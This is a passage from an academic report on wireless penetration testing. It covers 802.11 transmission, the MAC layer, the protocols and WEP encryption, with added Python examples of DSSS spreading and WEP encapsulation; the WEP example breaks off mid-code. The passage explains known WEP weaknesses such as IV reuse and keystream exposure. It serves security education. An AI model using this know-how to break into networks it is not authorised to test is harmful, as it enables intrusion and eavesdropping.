ABSTRACT
Wireless penetration testing is a new discipline within the information security
field. The rapid adoption of wireless technologies over recent years has made wireless
data networks one of the major attack vectors that organizations face today. Incident
handlers and law enforcement have been forced to deal with the complexity of these
technologies when managing and responding to security incidents. Thus, the need for new
tools to identify exploits and vulnerabilities in a wireless environment has grown in the
past few years.
The purpose of this project is to conduct a wireless penetration test and to analyze
the software tools needed to conduct such a test in a wireless network. By applying a
testing methodology, the project addresses the different types of security flaws that
companies face when using wireless networks, discusses some common tests, and
describes the methodology a pen-tester follows to carry them out. Finally, after analyzing
all the attacks deployed in the wireless penetration test, security countermeasures are
discussed.
TABLE OF CONTENTS
Abstract ............................................................................................................................... ii
Table of Contents............................................................................................................... iii
List of Figures .................................................................................................................... vi
List of Tables ................................................................................................................... viii
1. Introduction and Background ..................................................................................... 1
1.1 Wireless Local Networks.................................................................................... 4
1.1.1 Wireless Transmission Media..................................................................... 6
1.1.2 Wireless MAC layer ................................................................................... 9
1.1.3 IEEE 802.11 Protocols.............................................................................. 15
1.2 802.11 Security ................................................................................................. 18
1.2.1 Eavesdropping and Interference ............................................................... 18
1.2.2 Wired Equivalent Privacy ......................................................................... 21
1.2.3 Wi-Fi Protected Access............................................................................. 25
1.3 Wireless Penetration Testing ............................................................................ 26
1.3.1 Determining What Others Know .............................................................. 28
1.3.2 Mapping the Network ............................................................................... 29
1.3.3 Scanning the System................................................................................. 29
1.3.4 Performing a Vulnerability Assessment ................................................... 31
1.3.5 Penetrating the System.............................................................................. 31
2. Narrative ................................................................................................................... 40
2.1 Setting Up a Penetration Test Lab .................................................................... 41
2.1.1 Isolating the Pen-test Lab ........................................................................ 41
2.1.2 Securing from Unauthorized Access ........................................................ 43
2.1.3 Managing Storage Devices ....................................................................... 44
2.2 Types of Penetration Test labs.......................................................................... 45
2.2.1 Virtual Pen-Test Lab................................................................................. 45
2.2.2 Internal Pen-Test Lab................................................................................ 46
2.2.3 External Pen-Test Lab............................................................................... 47
2.2.4 Project-Specific Pen-test lab ..................................................................... 48
2.2.5 Ad Hoc Lab............................................................................................... 49
2.3 Pen-Test Lab Description ................................................................................. 49
2.3.1 Hardware Description ............................................................................... 49
2.3.2 Software Description ................................................................................ 52
3. System Research ....................................................................................................... 62
3.1 External Pen-test lab ......................................................................................... 62
3.1.1 Cracking WEP .......................................................................................... 68
3.1.2 Cracking WPA-PSK ................................................................................. 73
3.2 Internal Pen-test lab .......................................................................................... 76
3.2.1 Enumeration Attacks................................................................................. 76
3.2.2 Denial of Service Attacks ......................................................................... 79
4. Evaluation and Results.............................................................................................. 81
4.1 External Pen-test lab ......................................................................................... 82
4.1.1 First Scenario ............................................................................................ 82
4.1.2 Second Scenario........................................................................................ 82
4.1.3 Third Scenario........................................................................................... 85
4.2 Internal Pen-Test lab ......................................................................................... 85
4.2.1 Vulnerability Assessment ......................................................................... 85
4.2.2 Denial of Service Attacks ......................................................................... 86
5. Future Work .............................................................................................................. 88
6. Conclusion ................................................................................................................ 90
Bibliography and References............................................................................................ 93
Appendix A – Disc Copy................................................................................... 98
LIST OF FIGURES
Figure 1.1 802.11 and the OSI Model .........................................................................................................5
Figure 1.2 Spectrum Use by FHSS and DSSS Technologies .....................................................................7
Figure 1.3 FHSS and DSSS interference coping strategies .......................................................................9
Figure 1.4 Four-way Handshake process .................................................................................................11
Figure 1.5 802.11 WLAN data packet structure ......................................................................................12
Figure 1.6 802.11 MAC Headers ................................................................................................................12
Figure 1.7 Wireless Local Area Network Protocols ................................................................................16
Figure 1.8 Secret Key and IV packets .......................................................................................................21
Figure 1.9 Wired Equivalent Privacy process ..........................................................................................22
Figure 1.10 Shared Key Authentication ...................................................................................................24
Figure 2.1 A Sample Internal Pen-test lab ................................................................................................47
Figure 2.2 A Sample External Pen-test Lab..............................................................................................48
Figure 2.3 Backtrack 3.0 Desktop ..............................................................................................................52
Figure 2.4 NetStumbler Main Screen ........................................................................................................54
Figure 2.5 Graphical representation of Signal Strength..........................................................................55
Figure 2.6 The Kismet Interface ................................................................................................................56
Figure 3.1 External Pen-test Lab ...............................................................................................................62
Figure 3.2 Access Point Broadcasting........................................................................................................63
Figure 3.3 Output of Netstumbler..............................................................................................................64
Figure 3.4 Access Point Broadcasting........................................................................................................65
Figure 3.5 Network Details .........................................................................................................................66
Figure 3.6 Airodump-ng Captures Packets...............................................................................................69
Figure 3.7 Aireplay-ng starting to inject packets .....................................................................................71
Figure 3.8 The packet replay’s attack .......................................................................................................72
Figure 3.9 Aircrack-ng displaying the Key ...............................................................................................73
Figure 3.10 shows the process of searching...............................................................................................75
Figure 3.11 Network Layout.......................................................................................................................76
Figure 3.11 Nmap executing .......................................................................................................................77
LIST OF TABLES
Table 1.1 Commonly Hacked Wireless Network Ports ...........................................................................30
Table 2.1 Intel PRO/Wireless 3945 802.11 a/b/g wireless card specifications ........................................50
Table 2.2 Access Point Specifications ........................................................................................................51
Table 2.3 Nmap Options and Scan Types .................................................................................................61
Table 3.1 Nmap Results ..............................................................................................................................77
Table 4.1 Cracking WEP ............................................................................................................................83
1. INTRODUCTION AND BACKGROUND
Wireless security requires slightly different thinking from wired security because
it gives potential attackers easy access to the transport medium. This access significantly
increases the threat that any security architecture must address [Arbaugh 2003]. The
broadcast nature of wireless networking makes traditional link-layer attacks readily
available to anyone within radio range. Increasingly, companies and individuals use
wireless technology for important communications they want to keep private, such as
mobile e-commerce transactions, email, and corporate data transmissions. At the same
time, as wireless platforms mature, grow in popularity, and store valuable information,
hackers are stepping up their attacks on these new targets. This is a particular problem
because wireless devices, including smart cellular phones and personal digital assistants
(PDAs) with internet access, were not originally designed with security as a top priority
[Miller 2001].
Wireless networks have significantly impacted the world. Through them,
information can be sent easily and quickly without any wire. Wireless networks provide
all the functionality of wired networks without the physical constraints, and
configurations range from simple peer-to-peer links to complex networks offering
distributed data connectivity and roaming. They also allow end-user mobility within a
networked environment and enable physical network portability, which lets LANs move
with the users that make use of them. Furthermore, wireless networks can be used to
connect to the internet in countries and regions where the telecom infrastructure is poor
[Turnbull 2007].
Because of these advantages, the use of wireless networks has increased
dramatically over the past few years, changing not only how computers and electronic
devices interact, but also allowing mass networking with little reliance on central
infrastructure, and spontaneous communications. According to Andrew A. Vladimirov:
“by 2006 the number of shipped wireless networks hardware devices is estimated to
exceed 40 million units” [Vladimirov 2004].
With the prolific deployment of wireless networks in recent times, managing such
networks is particularly challenging due to the unreliable and often unprotected nature of
the wireless medium. The trade-off for flexibility and mobility is more threats from
hackers using scanners to intercept data or gain access to the wireless network. These
threats are not the common security issues, such as spyware, weak passwords, and
missing patches. Wireless networks introduce a new set of vulnerabilities from an
entirely different perspective: attacks that are either much more difficult or completely
impossible to execute against a standard wired network [Siles 2007].
Wireless networks are more susceptible to attacks by outsiders than wired LANs
are, since the attacker needs only to be within radio range rather than physically
connected to the network. This technology has been misused in several ways: as a device
for extortion and blackmail, as a means of entry into private networks and systems, and
as a means of telecommunication theft. As a result, wireless information security is an
emerging field of study and is becoming increasingly important as a means for
organizations to identify certain information security risks and abnormal network
behavior [Vladimirov 2004].
Although there are many methods of security assessment, such as audit trails and
template applications, the only way to truly know how secure a wireless network is, is to
test it. “Wireless Penetration testing is the process of attempting to gain access to
resources without knowledge of usernames, passwords and other normal means of
access” [Stephen 2006]. The main objective of penetration testing is to identify the
exploits and vulnerabilities that exist within an organization’s IT infrastructure and to
confirm the effectiveness of the security measures that have been implemented.
Furthermore, it helps to identify what information is exposed to the public or to the
Internet, giving a bird’s-eye perspective on current security. More importantly,
penetration testing provides a blueprint for remediation in order to start or enhance a
comprehensive information protection strategy [ISS 2008].
In order to carry out a successful penetration test, the test has to be designed to
model real-world scenarios as closely as possible. Attack scenarios can be made up to
model all plausible situations. The main thing that separates a penetration tester from an
attacker is permission, documented in an agreed scope and rules of engagement. While
most other auditing tends to touch only the surface of security, penetration testing is the
most effective method because it provides a “proof of concept” that the measures taken
to secure the network are not effective [Stephen 2006].
1.1 Wireless Local Networks
As mentioned before, Wireless Local Area Networks (WLANs) provide
connectivity between electronic devices without the need for a physical connection. They
transmit and receive data over the air via RF technology, combining data connectivity
with user mobility. They enable physical network portability, allowing LANs to move
with the users that make use of them. Since WLANs eliminate the physical link to the
network, an office infrastructure may be peripatetic, free to grow and move to suit the
needs of the organization, because the network backbone is no longer hidden behind
walls and floors [Siles 2007].
Although the growth and pervasiveness of wireless appears to be inevitable, the
path and speed of growth of this technology is not so predictable. WLANs are unlikely to
replace traditional wired networks. “Wireless has not yet matured to the point of being
suitable for a data-intensive corporate environment. Also, to say that WLANs are
completely deployed without wires would not be strictly correct. Unless a piece of
equipment is battery-powered, there must be a power cable connection, and a typical
configuration has one or more fixed access points that are connected to a LAN via
traditional data cable” [Nichols 2002].
The access points broadcast to and receive information from wireless clients that
are within transmission range. The transmission range of an access point varies
depending on the environment, the antenna, and the transmission power. In
environments with few obstacles the coverage area of a single access point can reach up
to several hundred feet and support a small group of users without noticeable
performance degradation [Turnbull 2007]. Note that an attacker with a high-gain
directional antenna can receive and inject traffic from well beyond the range at which a
standard client adapter works, so the nominal coverage area is not the boundary of the
network's attack surface.
In its simplest form, a WLAN comprises a single transceiver, called an access
point. Access points, which serve as communication beacons, are connected to a wired
network via an Ethernet cable, and exist at fixed locations throughout the organization.
Network clients with a wireless adapter installed are able to facilitate data transfer from
client to access point. In order to extend a wireless network‘s range, more access points
need to be introduced near the coverage boundaries of previously deployed broadcast
units. Thus, overlapping cells at their perimeters allow clients to maintain a connection at
all times by moving from cell to cell [Zyren 2007].
IEEE 802.11 is a set of standards for wireless local area network (WLAN)
computer communication, developed by the Institute of Electrical and Electronics
Engineers LAN/MAN Standards Committee, operating in the 5 GHz and 2.4 GHz
unlicensed spectrum bands. The set of standards is limited in scope to the Physical (PHY)
layer and the Medium Access Control (MAC) sub-layer, as shown in Figure 1.1
[WildPackets 2008].
Figure 1.1 802.11 and the OSI Model [WildPackets 2008]
1.1.1 Wireless Transmission Media
Wireless LANs employ radio frequency (RF) and infrared (IR) electromagnetic
waves to transfer data from point to point. The original 802.11 standard defines a single
MAC layer which interacts with three Physical layers: infrared, frequency-hopping
spread spectrum and direct-sequence spread spectrum [Nichols 2002].
Infrared
Infrared (IR) systems do not make for a practical enterprise WLAN solution and
therefore are not widely employed. IR is able to transfer data by taking advantage of
those frequencies located in close proximity to visible light on the electromagnetic
spectrum. The problem is that these high bands have the same limitations as visible light
in that they cannot penetrate nontransparent objects such as walls, floors, and ceilings. As
a result, WLANs transmitting via IR are restricted to operating within the same room
[Nichols 2002].
Wideband Radio Systems: Spread Spectrum
Originally deployed by the military, spread spectrum techniques are methods by
which energy generated in a particular bandwidth is deliberately spread in the frequency
domain, resulting in a signal with a wider bandwidth. They consume more bandwidth in
exchange for reliability, integrity, and security of communications. These techniques let
devices avoid interference and other signal noise in a way not possible with narrowband
radio systems, in which data is transmitted and received on a single specific frequency.
However, the benefits come at a price: a spread signal occupies far more spectrum, and to
other users of the band it appears as raised background noise [Nichols 2002].
Spread spectrum comes in two forms: Frequency-Hopping Spread Spectrum and
Direct-Sequence Spread Spectrum. Of the two, frequency hopping is less costly to
deploy; however, direct-sequence has the potential for more widespread use since it has
higher data rates, greater range, and a built-in error correction capability. The illustration
in Figure 1.2 of how frequency hopping and direct sequence systems use the spectrum is
explained more fully below [Chinitz 2007].
Figure 1.2 Spectrum Use by FHSS and DSSS Technologies [Chinitz 2007]
Frequency Hopping Spread Spectrum
Frequency Hopping Spread Spectrum (FHSS) is “the method of transmitting
radio signals by rapidly switching a carrier among many frequency channels, using a
pseudorandom sequence known to both transmitter and receiver” [Chinitz 2007]. FHSS
transmissions can share a frequency band with many types of conventional transmissions
with minimal interference. The FHSS side of Figure 1.2 shows two different hopping
sequences and how they use different, small slices of the spectrum for short periods of
time.
For interference to occur, the conflicting narrowband signal would need to be
broadcast at the same frequency and at the same time as the hopping signal. Whenever
interference occurs, the devices can continue their data transfer by hopping to the next
frequency that is clear. Thus, interference does not break a connection; it makes
throughput degrade gracefully [Nichols 2002].
Direct Sequence Spread Spectrum
Direct-Sequence Spread Spectrum (DSSS) is a method in which the transmitter
spreads the signal over a frequency band wider than that required by the information
signal, by multiplying each data bit by a pseudorandom sequence of +1 and -1 values.
Each element of this sequence is called a chip, and the sequence itself is the chipping
code. By spreading the energy of the original signal over a much wider band, the receiver
can recover the data by correlating what it hears against the same code, a statistical
decision that tolerates a number of damaged chips. The number of chips per data bit is
called the “spreading ratio”; a high spreading ratio increases the resistance of the signal
to interference [Chinitz 2007].
However, Direct-Sequence Spread Spectrum requires more bandwidth to operate,
generally using three non-overlapping channels to communicate. Its error-correcting
capability spares DSSS from having to retransmit data that was corrupted in transit: even
if one or more chips are damaged during transmission, the redundancy in the chipping
code lets the receiver recover the original data. In practice, DSSS spreading ratios for
wireless LANs are quite small (802.11b uses an 11-chip code at its lower rates). The
DSSS portion of Figure 1.2 shows two separate DSSS channels occupying a wide
bandwidth in a time-static manner [Chinitz 2007].
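The following Python script is added here as an illustration of the spreading and recovery described above; it is not part of the original project or of any tool it uses. It spreads data bits with the 11-chip Barker code that 802.11b uses at 1 and 2 Mbit/s and recovers them by correlation after several chips have been inverted. The Barker sequence is the standard one; the data bits and the positions of the damaged chips are constructed for the example.

```python
# Added example (not from the original document): direct-sequence spreading of
# data bits with the 11-chip Barker code (802.11b at 1 and 2 Mbit/s) and
# recovery by correlation even when several chips are corrupted in transit.
# The Barker sequence is the standard one; the error pattern is constructed.

BARKER_11 = [+1, -1, +1, +1, -1, +1, +1, +1, -1, -1, -1]  # 802.11b chipping code


def spread(bits):
    """Map each data bit to +1/-1 and multiply it by the chipping code.
    One data bit becomes len(BARKER_11) chips, i.e. a spreading ratio of 11."""
    chips = []
    for bit in bits:
        symbol = 1 if bit else -1
        chips.extend(symbol * c for c in BARKER_11)
    return chips


def despread(chips):
    """Correlate each 11-chip block with the code. A clean 1 bit correlates to
    +11 and a clean 0 bit to -11; the sign of the sum is the decision, so a
    few inverted chips only shrink the margin instead of flipping the bit."""
    n = len(BARKER_11)
    bits = []
    for i in range(0, len(chips), n):
        block = chips[i:i + n]
        correlation = sum(c * k for c, k in zip(block, BARKER_11))
        bits.append(1 if correlation > 0 else 0)
    return bits


def corrupt(chips, positions):
    """Constructed interference: invert the chips at the given indices."""
    damaged = list(chips)
    for p in positions:
        damaged[p] = -damaged[p]
    return damaged


def max_tolerated_chip_errors():
    """Largest number of inverted chips per bit that the sign decision survives."""
    return (len(BARKER_11) - 1) // 2   # 5 of 11 chips may be wrong


if __name__ == "__main__":
    data = [1, 0, 1, 1, 0]
    tx = spread(data)
    # Invert 3 chips inside the first bit and 5 inside the second: both decode.
    rx = corrupt(tx, [0, 4, 7, 11, 12, 13, 14, 15])
    print("sent     ", data)
    print("recovered", despread(rx))
```

With 11 chips per bit the decision survives up to five inverted chips per bit (a sixth flips the sign of the correlation); that margin is what the spreading ratio buys, a processing gain of 10·log10(11) ≈ 10.4 dB against narrowband interference. The script does not model the CCK modulation that 802.11b uses at 5.5 and 11 Mbit/s.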
On the other hand, one clear advantage that Frequency Hopping Spread
Spectrum systems have over Direct-Sequence Spread Spectrum systems is their resilience
to interference. While DSSS products spread their transmission power thinly across the
spectrum, FHSS networks hop around the entire 2.4 GHz band. Low levels of interference
can easily overpower a DSSS transmission. Furthermore, multi-channel DSSS products
use statically allocated pieces of the band, so interference in any significant piece of the
allocated band will disrupt the transmission, possibly destroying it entirely. This is
shown in Figure 1.3 [Nichols 2002].
Figure 1.3 FHSS and DSSS interference coping strategies [Chinitz 2007]
1.1.2 Wireless MAC layer
The 802.11 family specifies a common medium access control (MAC) Layer,
which provides a variety of functions that support the operation of 802.11-based wireless
LANs. In general, the MAC Layer is in charge of managing and maintaining
communications between 802.11 stations (radio network cards and access points) by
coordinating access to a shared radio channel and utilizing protocols that enhance
communications over a wireless medium [WildPackets 2008].
The 802.11 set of standards defines two different access methods: the Distributed
Coordination Function (DCF) and the Point Coordination Function (PCF), which simply
uses the access point as the controlling station in the wireless MAC. PCF has been
implemented in only very few hardware devices [WildPackets 2007].
The Distributed Coordination Function is a Carrier Sense Multiple Access with
Collision Avoidance (CSMA/CA) mechanism. In CSMA, a station wishing to transmit
first listens to the channel for a predetermined amount of time to check for any activity
on the channel. If the channel is sensed “idle”, the station is permitted to transmit.
Whenever the channel is sensed “busy”, the station must defer its transmission for a
random interval; this reduces the probability of collisions on the channel [Nichols 2002].
Under CSMA/CA, devices can use a four-way handshake to gain access to the
airwaves, which solves the hidden node problem: two stations that cannot hear each other
try to send packets to the access point at the same time and collide, because neither can
sense the other's transmission. The four-way handshake ensures collision avoidance by
solving this problem [WildPackets 2007]. This RTS/CTS exchange at the MAC layer is
unrelated to the WPA four-way key handshake.
Figure 1.4 Four-way Handshake process [WildPackets 2007]
The four-way handshake process starts with the source node sending a short
Request To Send (RTS) packet addressed to the intended destination. If the intended
destination hears the transmission and is able to receive, it replies with a short Clear To
Send (CTS) packet. The source node then sends the data, and the recipient acknowledges
every packet it receives by returning a short acknowledgment packet (ACK)
[WildPackets 2007]. Because the CTS is transmitted by the destination, stations that
could not hear the original sender still hear the CTS, read its Duration field, and defer for
the time it reserves, which is what resolves the hidden node problem.
Packet Structure and Packet Types
The 802.11 family of LAN protocols uses packets (called frames in the standard)
as the means to send information across the network. 802.11 networks have three basic
types of packets: Data, Management and Control packets. The data packet’s header
carries all the functionality of the protocol, since RF technology and station mobility
impose some complex requirements on 802.11 WLAN networks. This added complexity
is reflected in the long physical layer convergence protocol (PLCP) headers as well as
the data-rich MAC header. The 802.11 packet structure is shown in Figure 1.5
[WildPackets 2007].
Figure 1.5 802.11 WLAN data packet structure [WildPackets 2007]
Since 802.11 WLANs must be able to form and re-form their membership
constantly, and radio transmission conditions themselves can change, coordination
becomes a large issue in WLANs. Thus, management and control packets are mainly
dedicated to these coordination functions. In addition, the headers of data packets contain
further information about network conditions and topology. Figure 1.6 below shows the
802.11 MAC headers [WildPackets 2007]. Note that in 802.11 as described here,
management and control packets are neither encrypted nor authenticated, so any station
within range can read them and forge them.
Figure 1.6 802.11 MAC Headers [WildPackets 2007]
In order to explain the fields of the data header and the values they may take, the
steps followed by a device connecting to a WLAN and then transmitting information are
described below, followed by a list of the types of information that 802.11 WLAN data
packet headers convey and of the types carried in management and control packets.
The first step for a device joining a BSS or IBSS is authentication. This can be
an open system or a shared key exchange. Shared key authentication is only available
when WEP is enabled, but it should not be preferred: its challenge/response exposes a
plaintext challenge together with the same bytes encrypted under WEP, which hands an
eavesdropper a block of RC4 keystream and leaves the network weaker than open system
authentication with WEP. Authentication is handled by a request/response exchange of
management packets. The fields that are used are [WildPackets 2007]:
• Authentication ID: This is the name under which the current station
authenticated itself on joining the network.
• WEP Enabled: If this field is true, then the payload of the packet (but not the
WLAN headers) will be encrypted using Wired Equivalent Privacy.
The next step for a device joining a BSS or IBSS is to associate itself with the access
point. When roaming, a unit also needs to disassociate and re-associate. All these
functions are handled by an exchange of management packets, and the current status is
shown in packet headers. The relevant fields are [WildPackets 2007]:
• Association: A packet can show the current association of the sender. Association
is handled by request/response management packets. Also, disassociation is
handled with management packets and it is a simple declaration from either an
access point or a device.
• BSSID or IBSSID: The ID of the access point’s basic service set (the access
point’s MAC address) or of the ad hoc group. A device can only be associated with one
access point (identified by the BSSID) or IBSS at a time; the ESSID is the network name
and may be shared by many access points.
• Probe: Probes are supported by request/response management packets used by
roaming devices in search of a particular BSS or access point.
The 802.11 WLAN protocol supports rapid adjustment to changing conditions,
always seeking the best throughput. The fields that show this are [WildPackets 2007]:
• Channel: The channel or radio frequency used for the transmission.
• Data rate: The data rate used to transmit the packet.
• Fragmentation: The fragmentation done in 802.11 WLANs is completely
independent of any fragmentation imposed by higher level protocols such as
TCP/IP. It is based on the fact that a series of short transmissions is less
vulnerable to interference in noisy environments. Thus, fragmentation is
dynamically set by the protocol in an effort to reduce the number of
retransmissions.
• Synchronization: The network management packets called “beacon” keep
members of a BSS synchronized.
• Power Save: Because wireless devices need to conserve power, the 802.11
protocol uses a number of fields in data packets plus the PS-Poll (power save-
poll) control packet to let devices remain connected to the network while in power
save mode.
To ensure transmission of packets and the correct routing of them, the protocol uses
certain header fields and control packets. Those fields and control packets are:
• RTS, CTS, ACK: Control packets that are used in the four way handshake in
support of collision avoidance.
• Version: The version of the 802.11 protocol used in constructing the packet.
• Type and Sub-Type: The type of packet with a sub-type specifying its exact
function.
• Duration: A precise value for the time the medium should be reserved for the
remainder of the transaction of which this packet is a part.
• Length: Packet length.
• Retransmission: It is important to declare which packets are retransmissions.
• Sequence: Sequence information in packets helps reduce retransmissions.
• Order: Order of the packets.
• Addresses: There are four address fields in 802.11 WLAN data packets. This is
to accommodate the possibility of forwarding to, from, or through the distribution
system.
• To/From DS: Flags indicating whether the packet is headed to or from the
distribution system, since traffic can be routed from a device using one access point to
a device using a different access point somewhere along the wired network.
1.1.3 IEEE 802.11 Protocols
According to the IEEE 802.11 set of standards for wireless local area networks,
there are several protocols that define this type of network. The first WLAN standard to
become accepted in the market was 802.11b, followed by 802.11g and 802.11n. Figure
1.7 shows the basic differences among these protocols [WildPackets 2007].
Figure 1.7 Wireless Local Area Network Protocols [Broadcom 2006]
802.11a
According to IEEE 802.11a, WLAN networks operate in the frequency band
marked as U-NII (Unlicensed National Information Infrastructure), which represents the
bands 5.15-5.25 GHz, and are able to offer 54 Mbit/s as the maximum bit rate. 802.11a
specifies the physical layer for high bit rates, where the OFDM (Orthogonal Frequency
Division Multiplexing) system is used as a basis. Since the 2.4 GHz band is heavily used,
using the 5 GHz band gives this standard a significant advantage. However, using this
high frequency has the disadvantage of a less effective overall range than that of
802.11b/g. The reason is that 802.11a signals are absorbed more readily by walls and
other solid objects in their path [Zyren 2007].
802.11b
The IEEE 802.11b standard is a direct-sequence spread spectrum (DSSS)
technology. Wireless data networks using this standard divide the frequency spectrum into
several channels that can be used to establish multiple non-overlapping communications.
802.11b has a maximum raw data rate of 11 Mbit/s. However, “due to the CSMA/CA
protocol overhead, in practice the maximum 802.11b throughput that an application can
achieve is about 5.9 Mbit/s using TCP and 7.1 Mbit/s using UDP” [Broadcom 2006].
Another problem is that 802.11b devices suffer interference from other products
operating in the 2.4 GHz band. Yet, with all these limitations, 802.11b was the most
popular protocol for WLANs [Zyren 2007].
802.11g
In June 2003, the IEEE ratified 802.11g, which applied Orthogonal Frequency
Division Multiplexing (OFDM) modulation to the 2.4 GHz band. This combined the best
of both worlds: raw data rates up to 54 Mbps on the same radio frequency as the already
popular 802.11b. Today, the vast majority of computer network hardware shipping
supports 802.11g. Increasingly, as technology improves, it is becoming easier to support
both 2.4 GHz and 5 GHz in the same chipset [Broadcom 2006].
802.11n
Although 802.11n has not been ratified, its specifications are stable enough
for hardware makers to start building Wi-Fi cards and routers. This standard
provides for a variety of optional modes and configurations that dictate different
maximum raw data rates. 802.11n improves on the OFDM implementation
employed in the 802.11a/g standards. This change raises the highest attainable raw
data rate to 65 Mbps [Broadcom 2006].
1.2 802.11 Security
The security of WLANs is very important, especially for applications hosting
valuable information. Since WLANs operate in the same manner as a wired LAN, they
harbor many of the same vulnerabilities as a wired LAN, plus some that are specific to
WLANs. The first threat is the potential for unauthorized parties to eavesdrop on radio
signals sent between a wireless station and an AP, compromising the confidentiality of
private information. The second is unauthorized access, in which an intruder tries to
enter a WLAN system disguised as an authorized user. Another threat is interference and
jamming, which can seriously degrade bandwidth [Arbaugh 2003].
1.2.1 Eavesdropping and Interference
“Eavesdropping is the act of surreptitiously listening to a private conversation. It
is a passive attack because an eavesdropper can listen to a message without altering the
data” [Kowalski 2006]. The sender and the receiver of the message may not be aware of
the intrusion [Kowalski 2006].
Furthermore, with a compatible receiver within range of the transmission the
intruder can listen to the message, and since radio signals emitted from a WLAN can
propagate beyond the area in which they originate and penetrate walls, depending on the
strength of the signal, the intruder can be far away from the deployed WLAN [Kowalski
2006].
A second threat is the potential for an intruder to enter a WLAN system as an
authorized user without having the right permissions to do so. This attack is considered
an active attack, and can be carried out with a wireless adapter that is compatible with the
targeted network, or by using a compromised device that is linked to the network. A third
threat to WLAN security is radio interference that can seriously degrade bandwidth. In
many cases interference is accidental. Since 802.11b WLANs operate in the 2.4 GHz
radio frequency, other devices such as Bluetooth devices and cordless phones that operate
in the same frequency can overlap with WLAN traffic [Hassell 2004].
Of course, interference may also be intentional. An attacker with a powerful
transmitter can generate a radio signal stronger than the WLAN signals, disrupting
communications. This condition is known as jamming and is a denial-of-service attack.
Jamming equipment is readily available to consumers or can be constructed by
knowledgeable attackers. In addition, this type of attack can be done from a remote
location far from the targeted network [Bellardo 2003].
Although these threats can seriously endanger the security of a WLAN, there
are some countermeasures to lessen them. According to the IEEE 802.11 standard,
WLANs use Spread-Spectrum technology to transmit data. As mentioned before, Spread
Spectrum technology is designed to resist eavesdropping, interference and noise. With
Direct-Sequence Spread Spectrum, which is the technique most commonly used, the
eavesdropper must know the chipping code or code words (802.11b) [Vladimirov 2004].
Furthermore, the eavesdropper must also know the frequency band and
modulation techniques in order to accurately read the transmitted signal. Adding to an
eavesdropper’s difficulties is the fact that Spread-Spectrum technologies do not
interoperate with each other which means that a WLAN using FHSS cannot communicate
with WLAN using DSSS, and vice versa. Even if two different systems are using the
same technique, they cannot communicate if they are using different frequency bands. On
the other hand, Spread-Spectrum technology is only secure if the hopping pattern or
chipping code is unknown to the eavesdropper; however, these parameters are public
knowledge because they are published in the 802.11 standard. Also, the modulation
method is specified. Using this information, a knowledgeable eavesdropper could build a
receiver to intercept and read unprotected signals [Chinitz 2007].
A solution to prevent third parties from compromising transmitted data is to use
encryption. Wired Equivalent Privacy (WEP) was the first encryption standard available
for wireless networks. The purpose of WEP is to ensure that WLAN systems have a
level of privacy that is equivalent to that of wired LANs by encrypting radio signals. A
secondary purpose of WEP is to prevent unauthorized users from accessing WLANs by
providing a method of authorization [Arbaugh-Shankar 2001].
1.2.2 Wired Equivalent Privacy
Wired Equivalent Privacy (WEP) uses a secret key that is shared between a
wireless station and an access point (AP). All data sent and received between a wireless
station and an AP are encrypted using this secret key. The 802.11 standard does not
specify how the secret key is established. However, it does allow for an array that
associates a unique key with each device. In most cases, however, one key is shared
among all stations and APs in a given system [Nichols 2002].
“WEP provides data encryption using a 40-bit or 128-bit secret key and uses the
stream cipher RC4 (Pseudo Random Number Generator) for confidentiality and the CRC-
32 checksum for integrity. Indeed, two processes are applied to plaintext data: one
encrypts the plaintext, and the other protects it from unauthorized modification while it is
in transit” [Nichols 2002]. The process starts with a secret key being concatenated with a
random initialization vector (IV) that adds 24 bits to the resulting key. Figure 1.8 shows
that the secret key (40 or 104 bit) and IV (always 24 bit) combined are used to encrypt
the data packets and checksum (CRC) [Tamini 2006].
Figure 1.8 Secret Key and IV packets [Tamini 2006]
This key is inserted into the RC4 cipher (PRNG), which generates a long pseudo-
random key stream. The sender XORs the key stream with the
plaintext to generate encrypted text, or cipher text, and transmits it to the receiver along
with the IV. The receiver uses the IV and its own copy of the secret key to produce the
same key stream as the transmitter. Finally, the receiver XORs the key stream with the
cipher text to reveal the original plain text [Nichols 2002].
In order to protect the cipher text against unauthorized modification while in
transit, Wired Equivalent Privacy (WEP) applies an integrity check algorithm (CRC-32)
to the plain text. This second process produces an Integrity Check Value (ICV), which
is concatenated to the plain text before encryption. The ICV thus travels with the cipher
text and is sent to the receiver along with the IV. The receiver compares the output ICV,
which is the result of applying the integrity algorithm to the decrypted plain text, to the
transmitted ICV. If the two ICVs match, the message is authenticated. Figure 1.9
illustrates WEP encryption and decryption, respectively [Nichols 2002].
Figure 1.9 Wired Equivalent Privacy process [Tamini 2006]
Despite the potential strength of WEP for protecting the confidentiality and
integrity of data, it has limitations and flaws that can only be partially addressed by
proper management. The first problem stems from the reuse of the Initialization Vector (IV).
The IV is included in the unencrypted part of the message so the receiver knows what IV
to use when generating the key stream for decryption. If the same IV is reused for
subsequent messages, an eavesdropper may be able to cryptanalyze the key stream
generated by the IV and secret key and thus decrypt messages that use that IV [Tamini
2006].
Reusing the IV potentially leads to another problem. Once an attacker knows the
key sequence for an encrypted message, he can use this information to create a new
message. The attacker can transmit the message to the AP or wireless station, which
would accept it as a valid message. The 802.11 standard recommends changing the IV
after each transmission, which can prevent both problems. However, since it is not
required, many implementations do not change the value of the IV frequently enough [Tamini 2006].
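The encapsulation just described and the IV-reuse problem, worked through as an added Python example written for this page (it is not code from the thesis or from any WEP implementation). The key, IVs and frames are constructed values, and the 1-byte key-ID field that follows the IV on the air is left out to keep the frame layout simple.

```python
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA then PRGA). WEP seeds it with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """Integrity Check Value: CRC-32 of the plaintext, sent little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encapsulate(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV || ((plaintext || ICV) XOR RC4(IV || key)).
    Simplification in this constructed example: the key-ID byte is omitted."""
    if len(iv) != 3 or len(secret_key) not in (5, 13):   # 24-bit IV, 40/104-bit key
        raise ValueError("WEP needs a 3-byte IV and a 5- or 13-byte key")
    payload = plaintext + icv(plaintext)
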